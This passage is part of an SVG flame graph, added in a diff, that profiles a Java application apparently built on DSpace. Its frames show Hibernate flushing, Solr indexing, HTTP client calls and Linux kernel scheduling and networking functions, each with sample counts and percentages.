+<text  x="262.11" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntitySerializer:::serialize (1 samples, 0.08%)</title><rect x="1149.7" y="357" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="367.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList:::toArray (1 samples, 0.08%)</title><rect x="802.3" y="341" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="805.29" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (3 samples, 0.24%)</title><rect x="1085.1" y="405" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1088.11" y="415.5" ></text>
+</g>
+<g >
+<title>ctx_sched_in (1 samples, 0.08%)</title><rect x="13.7" y="661" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="16.75" y="671.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractType:::isCollectionType (2 samples, 0.16%)</title><rect x="237.6" y="405" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="240.57" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%)</title><rect x="443.6" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="446.60" y="415.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="801.3" y="293" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="804.35" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/FormBodyPart:::generateContentType (1 samples, 0.08%)</title><rect x="787.3" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="790.30" y="479.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::hashCode (1 samples, 0.08%)</title><rect x="1143.2" y="405" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1146.17" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::getCollectionEntry (1 samples, 0.08%)</title><rect x="984.9" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="987.90" y="399.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (207 samples, 16.43%)</title><rect x="118.6" y="469" width="193.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="121.63" y="479.5" >sun/reflect/GeneratedMeth..</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::setOwner (1 samples, 0.08%)</title><rect x="175.8" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="178.76" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/FullTextContentStreams:::getStream (5 samples, 0.40%)</title><rect x="788.2" y="485" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="495.5" ></text>
+</g>
+<g >
+<title>load_balance (1 samples, 0.08%)</title><rect x="81.2" y="629" width="0.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="84.17" y="639.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (1 samples, 0.08%)</title><rect x="777.0" y="245" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (1 samples, 0.08%)</title><rect x="1140.4" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.37" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="531.6" y="357" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="534.63" y="367.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (2 samples, 0.16%)</title><rect x="955.9" y="389" width="1.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="958.87" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Collection:::getName (1 samples, 0.08%)</title><rect x="777.0" y="341" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst437_1e:::getHibernateLazyInitializer (3 samples, 0.24%)</title><rect x="230.1" y="389" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="233.08" y="399.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (3 samples, 0.24%)</title><rect x="767.6" y="405" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="770.63" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1161.9" y="197" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1164.90" y="207.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (2 samples, 0.16%)</title><rect x="1099.2" y="421" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1102.16" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (43 samples, 3.41%)</title><rect x="272.2" y="437" width="40.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="275.22" y="447.5" >org..</text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/JdbcCoordinatorImpl:::release (1 samples, 0.08%)</title><rect x="312.5" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="315.49" y="463.5" ></text>
+</g>
+<g >
+<title>tcp_push (27 samples, 2.14%)</title><rect x="88.7" y="725" width="25.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="91.67" y="735.5" >t..</text>
+</g>
+<g >
+<title>dev_hard_start_xmit (1 samples, 0.08%)</title><rect x="110.2" y="517" width="0.9" height="15.0" fill="rgb(244,115,115)" rx="2" ry="2" />
+<text  x="113.21" y="527.5" ></text>
+</g>
+<g >
+<title>tcp_newly_delivered (1 samples, 0.08%)</title><rect x="99.0" y="293" width="0.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="101.97" y="303.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="769.5" y="373" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="772.51" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (2 samples, 0.16%)</title><rect x="845.4" y="437" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="848.37" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/MultipartEntity:::getContentType (1 samples, 0.08%)</title><rect x="1153.5" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1156.48" y="399.5" ></text>
+</g>
+<g >
+<title>itable stub (14 samples, 1.11%)</title><rect x="158.9" y="405" width="13.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="161.90" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (2 samples, 0.16%)</title><rect x="255.4" y="421" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="258.37" y="431.5" ></text>
+</g>
+<g >
+<title>queued_spin_lock_slowpath (1 samples, 0.08%)</title><rect x="59.6" y="597" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="62.63" y="607.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::loadFromDatasource (3 samples, 0.24%)</title><rect x="758.3" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/FormBodyPart:::&lt;init&gt; (2 samples, 0.16%)</title><rect x="786.4" y="485" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="789.37" y="495.5" ></text>
+</g>
+<g >
+<title>[libjava.so] (2 samples, 0.16%)</title><rect x="789.2" y="373" width="1.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="792.17" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1006.4" y="357" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1009.44" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration$1:::entrySet (16 samples, 1.27%)</title><rect x="822.0" y="437" width="14.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="824.95" y="447.5" ></text>
+</g>
+<g >
+<title>ip_rcv_finish (5 samples, 0.40%)</title><rect x="97.1" y="405" width="4.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="100.10" y="415.5" ></text>
+</g>
+<g >
+<title>Interpreter (1,118 samples, 88.73%)</title><rect x="118.6" y="581" width="1047.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="121.63" y="591.5" >Interpreter</text>
+</g>
+<g >
+<title>Interpreter (1,118 samples, 88.73%)</title><rect x="118.6" y="693" width="1047.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="121.63" y="703.5" >Interpreter</text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::receiveResponseHeader (1 samples, 0.08%)</title><rect x="1158.2" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="367.5" ></text>
+</g>
+<g >
+<title>itable stub (13 samples, 1.03%)</title><rect x="898.7" y="389" width="12.2" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="901.75" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst437_1e:::getHibernateLazyInitializer (1 samples, 0.08%)</title><rect x="172.0" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="175.02" y="415.5" ></text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.08%)</title><rect x="223.5" y="293" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="226.52" y="303.5" ></text>
+</g>
+<g >
+<title>handle_irq_event_percpu (1 samples, 0.08%)</title><rect x="1124.4" y="341" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1127.44" y="351.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (1 samples, 0.08%)</title><rect x="1138.5" y="437" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1141.49" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::compile (1 samples, 0.08%)</title><rect x="844.4" y="485" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="847.43" y="495.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.08%)</title><rect x="971.8" y="405" width="0.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="974.79" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::checkNoUnresolvedActionsAfterOperation (1 samples, 0.08%)</title><rect x="994.3" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="997.27" y="399.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.08%)</title><rect x="223.5" y="373" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="226.52" y="383.5" ></text>
+</g>
+<g >
+<title>update_blocked_averages (1 samples, 0.08%)</title><rect x="59.6" y="613" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="62.63" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (1 samples, 0.08%)</title><rect x="788.2" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="431.5" ></text>
+</g>
+<g >
+<title>dev_queue_xmit (1 samples, 0.08%)</title><rect x="110.2" y="549" width="0.9" height="15.0" fill="rgb(244,115,115)" rx="2" ry="2" />
+<text  x="113.21" y="559.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::prepareQueryStatement (1 samples, 0.08%)</title><rect x="783.6" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="786.56" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="790.1" y="325" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="793.11" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadata (1 samples, 0.08%)</title><rect x="778.9" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.87" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceContentInOriginalBundleFilterPlugin:::additionalIndex (4 samples, 0.32%)</title><rect x="782.6" y="517" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::findNodesForKey (1 samples, 0.08%)</title><rect x="1139.4" y="453" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1142.43" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/criteria/CriteriaQueryTranslator:::getWhereCondition (1 samples, 0.08%)</title><rect x="1012.1" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1015.06" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.08%)</title><rect x="781.7" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="784.68" y="431.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.08%)</title><rect x="990.5" y="309" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="993.52" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/FormBodyPart:::generateContentDisp (1 samples, 0.08%)</title><rect x="786.4" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="789.37" y="479.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (48 samples, 3.81%)</title><rect x="14.7" y="629" width="44.9" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="17.68" y="639.5" >__in..</text>
+</g>
+<g >
+<title>_new_array_Java (1 samples, 0.08%)</title><rect x="798.5" y="293" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="801.54" y="303.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.08%)</title><rect x="313.4" y="389" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="316.43" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/HibernateDBConnection:::uncacheEntity (207 samples, 16.43%)</title><rect x="118.6" y="501" width="193.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="121.63" y="511.5" >org/dspace/core/Hibernate..</text>
+</g>
+<g >
+<title>org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (2 samples, 0.16%)</title><rect x="777.0" y="485" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="495.5" ></text>
+</g>
+<g >
+<title>jlong_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="804.2" y="437" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="807.16" y="447.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (17 samples, 1.35%)</title><rect x="64.3" y="645" width="15.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="67.32" y="655.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (3 samples, 0.24%)</title><rect x="173.0" y="405" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="175.95" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadingAction:::requiresNoCascadeChecking (1 samples, 0.08%)</title><rect x="620.6" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="623.60" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (5 samples, 0.40%)</title><rect x="1127.3" y="421" width="4.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.25" y="431.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (50 samples, 3.97%)</title><rect x="13.7" y="837" width="46.9" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="16.75" y="847.5" >entr..</text>
+</g>
+<g >
+<title>__lll_lock_wait (4 samples, 0.32%)</title><rect x="10.0" y="853" width="3.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="13.00" y="863.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getQueuedOrphans (1 samples, 0.08%)</title><rect x="287.2" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="290.21" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (7 samples, 0.56%)</title><rect x="1148.8" y="485" width="6.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1151.79" y="495.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (4 samples, 0.32%)</title><rect x="10.0" y="629" width="3.7" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="13.00" y="639.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeIntegerFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="954.9" y="389" width="1.0" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="957.94" y="399.5" ></text>
+</g>
+<g >
+<title>jlong_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="763.9" y="517" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="766.89" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (2 samples, 0.16%)</title><rect x="791.0" y="389" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.05" y="399.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.08%)</title><rect x="1149.7" y="261" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1152.73" y="271.5" ></text>
+</g>
+<g >
+<title>all (1,260 samples, 100%)</title><rect x="10.0" y="901" width="1180.0" height="15.0" fill="rgb(255,130,130)" rx="2" ry="2" />
+<text  x="13.00" y="911.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (1 samples, 0.08%)</title><rect x="1119.8" y="373" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1122.76" y="383.5" ></text>
+</g>
+<g >
+<title>java/io/FileInputStream:::open0 (2 samples, 0.16%)</title><rect x="789.2" y="389" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="792.17" y="399.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (50 samples, 3.97%)</title><rect x="13.7" y="805" width="46.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="16.75" y="815.5" >__x6..</text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (18 samples, 1.43%)</title><rect x="820.1" y="469" width="16.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.08" y="479.5" ></text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (1 samples, 0.08%)</title><rect x="817.3" y="197" width="0.9" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="820.27" y="207.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::error (2 samples, 0.16%)</title><rect x="791.0" y="405" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.05" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::processSubNodes (1 samples, 0.08%)</title><rect x="848.2" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="851.17" y="415.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (12 samples, 0.95%)</title><rect x="1178.8" y="709" width="11.2" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="1181.76" y="719.5" ></text>
+</g>
+<g >
+<title>JVM_InternString (1 samples, 0.08%)</title><rect x="1006.4" y="389" width="1.0" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1009.44" y="399.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (49 samples, 3.89%)</title><rect x="13.7" y="693" width="45.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="16.75" y="703.5" >__pe..</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="1004.6" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1007.57" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (37 samples, 2.94%)</title><rect x="969.9" y="421" width="34.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="972.92" y="431.5" >or..</text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (3 samples, 0.24%)</title><rect x="546.6" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="549.62" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadata (1 samples, 0.08%)</title><rect x="784.5" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="787.49" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/ImmutableHttpProcessor:::process (2 samples, 0.16%)</title><rect x="1153.5" y="421" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1156.48" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/util/StringHelper:::replace (1 samples, 0.08%)</title><rect x="1011.1" y="357" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1014.13" y="367.5" ></text>
+</g>
+<g >
+<title>__tcp_transmit_skb (24 samples, 1.90%)</title><rect x="88.7" y="677" width="22.4" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="91.67" y="687.5" >_..</text>
+</g>
+<g >
+<title>tick_do_update_jiffies64.part.0 (1 samples, 0.08%)</title><rect x="990.5" y="245" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="993.52" y="255.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadata (1 samples, 0.08%)</title><rect x="777.0" y="325" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadata (11 samples, 0.87%)</title><rect x="766.7" y="517" width="10.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="769.70" y="527.5" ></text>
+</g>
+<g >
+<title>interrupt_entry (1 samples, 0.08%)</title><rect x="427.7" y="405" width="0.9" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="430.68" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="373" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentSet:::toArray (1 samples, 0.08%)</title><rect x="777.9" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.94" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="799.5" y="261" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="802.48" y="271.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::hasHolder (1 samples, 0.08%)</title><rect x="496.0" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="499.05" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingPreparedStatement:::executeQuery (1 samples, 0.08%)</title><rect x="761.1" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (1 samples, 0.08%)</title><rect x="1135.7" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1138.68" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/MultipartEntityBuilder:::buildEntity (1 samples, 0.08%)</title><rect x="802.3" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="805.29" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (84 samples, 6.67%)</title><rect x="879.1" y="405" width="78.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="882.08" y="415.5" >org/hiber..</text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (7 samples, 0.56%)</title><rect x="301.3" y="405" width="6.5" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="304.25" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/ManyToOneType:::isDirty (1 samples, 0.08%)</title><rect x="528.8" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="531.83" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="781.7" y="341" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="784.68" y="351.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="787.3" y="453" width="0.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="790.30" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::onLoad (3 samples, 0.24%)</title><rect x="758.3" y="469" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="479.5" ></text>
+</g>
+<g >
+<title>group_sched_in (1 samples, 0.08%)</title><rect x="64.3" y="565" width="1.0" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="67.32" y="575.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::requiresIndexing (9 samples, 0.71%)</title><rect x="1146.9" y="533" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1149.92" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::isEntityType (1 samples, 0.08%)</title><rect x="1094.5" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1097.48" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.08%)</title><rect x="785.4" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.43" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::warn (1 samples, 0.08%)</title><rect x="788.2" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="447.5" ></text>
+</g>
+<g >
